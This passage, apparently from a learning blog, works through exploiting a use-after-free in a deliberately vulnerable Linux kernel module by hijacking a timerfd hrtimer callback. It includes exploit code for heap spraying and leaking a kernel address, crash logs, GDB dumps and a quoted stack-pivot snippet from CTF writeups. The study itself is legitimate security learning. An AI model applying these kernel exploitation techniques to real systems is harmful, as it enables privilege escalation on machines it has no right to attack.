So __run_hrtimer(), the function responsible for calling the hrtimer_restart function, first calls __remove_hrtimer(), which ends up in rb_erase() through timerqueue_del() and rb_erase_cached(). The tree node is dereferenced before our function pointer is ever used.

At this point, there are a couple of approaches I could think of:

  1. Find a Return-Oriented Programming (ROP) gadget that pivots RSP to timerfd_ctx + some_offset.

  2. Race conditions? Somehow change timerfd_ctx[0] just after rb_erase has returned and before hrtimer_restart is called?

I do not yet understand race conditions well enough in this context to know whether that's even possible. At this point, I went through D3vil's writeup for HotRod. Interestingly, he sets timerfd_ctx[0] to &timerfd_ctx[0] + some_offset and then moves the value stored at RDI into ESP, and that doesn't seem to crash the kernel. Keep in mind that Supervisor Mode Access Prevention (SMAP) is disabled in that challenge, so a 32-bit stack pointer was enough in that case. The writeup also goes over using userfaultfd to exploit race conditions reliably, but on recent kernels (since Linux 5.11) unprivileged userfaultfd can no longer intercept kernel-mode faults by default, so we need to look into Filesystem in Userspace (FUSE) for that instead. Maybe something I can have a look at next.

If that works, it would suggest that the timer argument passed to __run_hrtimer below is taken from timerfd_ctx[0].

static void __hrtimer_run_queues(struct hrtimer_cpu_base *cpu_base, ktime_t now,
				 unsigned long flags, unsigned int active_mask)
{
	struct hrtimer_clock_base *base;
	unsigned int active = cpu_base->active_bases & active_mask;

	for_each_active_base(base, cpu_base, active) {
		struct timerqueue_node *node;
		ktime_t basenow;

		basenow = ktime_add(now, base->offset);

		while ((node = timerqueue_getnext(&base->active))) {
			struct hrtimer *timer;

			timer = container_of(node, struct hrtimer, node);

			/*
			 * The immediate goal for using the softexpires is
			 * minimizing wakeups, not running timers at the
			 * earliest interrupt after their soft expiration.
			 * This allows us to avoid using a Priority Search
			 * Tree, which can answer a stabbing query for
			 * overlapping intervals and instead use the simple
			 * BST we already have.
			 * We don't add extra wakeups by delaying timers that
			 * are right-of a not yet expired timer, because that
			 * timer will have to trigger a wakeup anyway.
			 */
			if (basenow < hrtimer_get_softexpires_tv64(timer))
				break;

			__run_hrtimer(cpu_base, base, timer, &basenow, flags);
			if (active_mask == HRTIMER_ACTIVE_SOFT)
				hrtimer_sync_wait_running(cpu_base, flags);
		}
	}
}
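Going by the listing above, the timer pointer is computed from the node's address (which comes from the tree head via timerqueue_getnext) rather than read out of the node's contents. A minimal userland sketch of that container_of step, using hypothetical mirror types and a local copy of the macro, looks like this:

```c
#include <assert.h>
#include <stddef.h>

/* Local copy of the container_of idea: subtract the member offset
 * from the member's address to get the enclosing struct. */
#define container_of_mirror(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

struct tq_node_mirror {
    unsigned long rb_words[3];           /* stands in for struct rb_node */
    long long expires;
};

struct hrtimer_mirror {
    struct tq_node_mirror node;          /* first member, as in struct hrtimer */
    long long softexpires;
    void *function;
};

static_assert(offsetof(struct hrtimer_mirror, node) == 0,
              "node must be the first member");

/* Returns 1 if the recovered timer pointer equals the node's address. */
static int timer_pointer_equals_node_pointer(void)
{
    struct hrtimer_mirror t = {0};
    struct tq_node_mirror *from_tree = &t.node;  /* what the tree lookup returns */
    struct hrtimer_mirror *timer =
        container_of_mirror(from_tree, struct hrtimer_mirror, node);

    return (void *)timer == (void *)from_tree && timer == &t;
}
```

Because node sits at offset 0, the timer pointer is just the node pointer. Whatever is stored in the first 8 bytes of the object does not feed into this calculation, although the tree code still follows it when the node is removed.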

Try #4

Well, we could check the source code to see whether that's what happens, but (skill issue) we can also just test it. Let’s set timerfd_ctx[0] to &timerfd_ctx[0]+100. If the hypothesis holds, this should give us a page fault for trying to execute &timerfd_ctx[0]+100 at RIP with our current ROP gadget.

./exploit
uaf_buf: 0x19cd840
base_address: 0xffffffff9bc00000
timerfd_tmrproc: 0xffffffff9bee6a20
gadget1: 0xffffffff9be41107
previous_buf: 0x1
[    2.558530] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[    2.560838] BUG: kernel NULL pointer dereference, address: 0000000000000074
[    2.561136] #PF: supervisor read access in kernel mode
[    2.561279] #PF: error_code(0x0000) - not-present page
[    2.561463] PGD 1c04067 P4D 1bfd067 PUD 1c18067 PMD 0 

[    2.562034] CPU: 0 PID: 65 Comm: exploit Tainted: G           O       6.6.16 #1
[    2.562239] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[    2.562550] RIP: 0010:rb_erase+0x84/0x3a0
[    2.562947] Code: 89 16 48 8b 57 10 48 89 50 10 48 8b 32 83 e6 01 4c 01 d6 48 89 32 48 8b 17 48 83 fa 03 0f 86 82 00 00 00 48 89 d6 48 83 e6 fc <48> 3b 7e 10 0f 84 e4 00 00 00 48 89 46 08 4d 85 c9 74 0f 48 83 c1
[    2.563416] RSP: 0018:ff623b9d00003f10 EFLAGS: 00010002
[    2.563559] RAX: ff17ea7401987128 RBX: ff17ea7401bf4d00 RCX: ff17ea7401987128
[    2.563795] RDX: 0000000000000065 RSI: 0000000000000064 RDI: ff17ea7401bf4d00
[    2.563975] RBP: ff17ea740761f220 R08: ff17ea740761f220 R09: 0000000000000000
[    2.564142] R10: ff17ea7401987128 R11: ff623b9d00003ff8 R12: 0000000000000006
[    2.564308] R13: ff17ea740761f220 R14: ff17ea7401bf4d00 R15: ff17ea740761f200
[    2.564524] FS:  00000000019cc3c0(0000) GS:ff17ea7407600000(0000) knlGS:0000000000000000
[    2.564799] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    2.564986] CR2: 0000000000000074 CR3: 0000000001c10000 CR4: 0000000000751ef0
[    2.565247] PKRU: 55555554
[    2.565386] Call Trace:
[    2.566143]  <IRQ>
[    2.566406]  ? __die+0x1e/0x60
[    2.566549]  ? page_fault_oops+0x17c/0x470
[    2.566697]  ? exc_page_fault+0x6b/0x150
[    2.566782]  ? asm_exc_page_fault+0x26/0x30
[    2.566895]  ? rb_erase+0x84/0x3a0
[    2.566989]  timerqueue_del+0x2e/0x50
[    2.567120]  __hrtimer_run_queues+0xdf/0x2a0

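That is not what happens: the kernel faults inside rb_erase again before our gadget ever runs. Interestingly, this time it is a page fault, which is the kind of fault userfaultfd is built to intercept, so would it end up handling this situation as well? I really have no clue at the moment and need to dig further.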
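The faulting address in that log can at least be explained with a bit of arithmetic. In the register dump RDX is 0x65, RSI is 0x64 and CR2 is 0x74, which is consistent with rb_erase taking the first word of the node, masking off the two low bits to get the parent pointer, and then reading parent->rb_left at offset 0x10. The sketch below reproduces that calculation; the names are hypothetical and the x86_64 layout is assumed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct rb_node_layout {
    unsigned long parent_color;          /* __rb_parent_color */
    void *rb_right;
    void *rb_left;
};

static_assert(offsetof(struct rb_node_layout, rb_left) == 0x10,
              "x86_64 layout assumed");

/* Address touched when reading parent->rb_left, where parent is the
 * first word of the node with its two low (colour) bits masked off. */
static uint64_t parent_rb_left_address(uint64_t first_word)
{
    uint64_t parent = first_word & ~(uint64_t)3;
    return parent + offsetof(struct rb_node_layout, rb_left);
}
```

parent_rb_left_address(0x65) is 0x74, matching CR2. In other words, the first word held the small value 0x65 at that moment rather than a heap pointer, so the fault is a plain NULL-page dereference in kernel code.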

I still tried something different, to replicate the approach from the writeup above: get the leak from the first timer, free it with close(timer_fd), then try to get another timerfd_ctx allocated in its place. But no matter how hard I tried, the second timerfd_ctx never landed in my freed chunk with the code below, so 0xdeadbeefdeadbe00 was never called.

int vuln_fd = open("/dev/vuln", O_RDWR);
char *uaf_buf = malloc(alloc_size);  // assume not failed
char *uaf_buf2 = malloc(alloc_size); // assume not failed
memset(uaf_buf2, 0, alloc_size);

struct itimerspec timer_spec = {{0, 0}, {10, 0}};
int timer_fd, timer_fds[20];
int spray_count = 0;

if (ioctl(vuln_fd, ALLOC, &alloc_size) != 0) {
    // assume not failed to reduce text
}
if (ioctl(vuln_fd, FREE) != 0) {
    // assume not failed to reduce text
}

// allocation 1: used only for the leak, then released
timer_fd = timerfd_create(CLOCK_REALTIME, 0);
timerfd_settime(timer_fd, 0, &timer_spec, 0);
close(timer_fd);
sleep(1);

if (ioctl(vuln_fd, USE_READ, uaf_buf) != 0) {
    perror("USE_READ failed");
    goto cleanup;
}

// allocation 2: spray, hoping one lands in the freed chunk
for (; spray_count < 20; spray_count++) {
    timer_fds[spray_count] = timerfd_create(CLOCK_REALTIME, 0);
}
for (int i = 0; i < spray_count; i++) {
    timerfd_settime(timer_fds[i], 0, &timer_spec, NULL);
}
sleep(1);

uint64_t *leak = (uint64_t*)uaf_buf;
uint64_t timerfd_tmrproc = leak[5];
base_kernel_address = timerfd_tmrproc - TIMERFD_TMRPROC_OFFSET;
leak[5] = 0xdeadbeefdeadbe00; // marker value to confirm RIP control
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
    printf("USE_WRITE failed\n");
    goto cleanup;
}
wait_for_enter();

However, if you go over Will’s Root’s HotRod writeup, he uses an xchg eax, esp gadget (xchg_eax_esp) for the stack pivot, something I really did not understand. Where and how is he controlling $eax?

Looking at the register values when our target function is called, $rax does seem to hold a pointer into the heap, but to where????

Breakpoint 2, 0xffffffff88e41107 in ?? ()
(gdb) i r
rax            0xff19fc968761f701  -64742996173523199
rbx            0xffffffff88e41107  -1998319353
rcx            0x1                 1
rdx            0x0                 0
rsi            0x2                 2
rdi            0xff19fc9681c02900  -64742996268013312
rbp            0xff19fc968761f1c0  0xff19fc968761f1c0
rsp            0xff4ea116c0003f28  0xff4ea116c0003f28
r8             0xff19fc968761f220  -64742996173524448
r9             0x0                 0
r10            0x0                 0
r11            0xff4ea116c0003ff8  -49925426771902472
r12            0x2                 2
r13            0xff19fc968761f220  -64742996173524448
r14            0xff19fc9681c02900  -64742996268013312
r15            0xff19fc968761f200  -64742996173524480
rip            0xffffffff88e41107  0xffffffff88e41107
eflags         0x82                [ IOPL=0 SF ]

There the pivot_target in user space is set to:

	// mmap page for rop chain
	unsigned long pivot_target = xchg_eax_esp & 0xffffffff;
	unsigned long *fake_stack = mmap(pivot_target & 0xfffff000, 0x50000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED|MAP_POPULATE, 0, 0);

Do let me know if you understand the above better.
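My current guess, not verified against the HotRod kernel: xchg eax, esp works on the 32-bit halves of the registers, and writing a 32-bit register zeroes the upper half of the 64-bit one, so after the gadget RSP is simply the low 32 bits of RAX. That is a userland address, which is only usable as a stack because SMAP is off there. The `xchg_eax_esp & 0xffffffff` in the snippet would line up with this if RAX holds the gadget's own address when the gadget runs (for example, if the hijacked pointer is called through RAX); that last part is an assumption on my side. The arithmetic itself can be sketched as follows, with hypothetical helper names:

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_MASK_4K 0xfffULL

static_assert(((PAGE_MASK_4K + 1) & PAGE_MASK_4K) == 0,
              "page size must be a power of two");

/* RSP after `xchg eax, esp`: the low 32 bits of RAX, zero-extended. */
static uint64_t rsp_after_xchg_eax_esp(uint64_t rax)
{
    return rax & 0xffffffffULL;
}

/* Page-aligned address that would have to be mmap()ed for the fake stack. */
static uint64_t page_base(uint64_t addr)
{
    return addr & ~PAGE_MASK_4K;
}
```

With the RAX value from my GDB dump above (0xff19fc968761f701), the pivot would land at 0x8761f701, on the page starting at 0x8761f000. In my case RAX is a heap-looking pointer rather than the gadget address (RBX holds the gadget), so the fake stack location would differ from run to run.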

What’s next?

I will probably have a look at FUSE (Filesystem in Userspace) next, or at why their exploit worked, but it might take some time to do that and write a blog about it, so stay tuned I guess.